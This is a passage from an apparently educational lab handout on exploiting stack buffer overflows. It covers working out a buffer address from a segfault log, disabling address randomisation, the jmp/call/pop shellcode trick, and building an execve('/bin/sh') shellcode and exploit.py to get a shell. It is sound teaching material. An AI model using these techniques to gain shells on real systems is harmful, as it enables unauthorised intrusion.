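    return sp - (offset + 4)


line = ("[150008.596439] vuln[2964]: segfault at 1 "
        "ip 00000000bffffc56 sp 00000000bffffdd0 error 6")
print(hex(buffer_addr_from_segfault(line, 86)))  # prints 0xbffffd76
```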
Environment variables are stored on the stack, so the environment influences the esp address. It's generally a very good idea to run the vulnerable program under env -i.
Let's do a similar task to the one above. In the 08-challenge-shellcode-in-stack-buffer-2/
subfolder from the tasks archive there is a slightly updated vulnerable file. Use the same vulnerability as in the task above to obtain a shell.
$ linux32 -3 -R bash -l
Another way of working with strings is to declare them as data inside the shellcode. However, if you do this, you won't know their address at compile-time. You have to obtain the address at runtime by abusing the call instruction, like this:
    jmp str
back:
    pop ecx    ; call pushes the return address on the stack, which in our case is precisely the string address
    ...
str:
    call back
    db 'Hello, world'
Write the shellcode that prints “Hello, world!” using this method.
Switch to the 10-challenge-known-buffer directory. You'll have to exploit the vulnerable binary found there and get a shell.
First, write a shellcode that runs execve("/bin/sh", ["sh", NULL], NULL). Use the template found in the shellcode_template directory. Run make to compile the shellcode and make test to compile the test executable.
The complete exploit will go into the exploit.py file.
You'll first run the program under gdb and use it to inspect the addresses. You'll find the buffer address, then you'll use this address in the exploit.
For this to work, we have to assume that when you run the program the buffer address will be the same as the one you found with gdb. In general this is not true, but we can make it so by doing the following: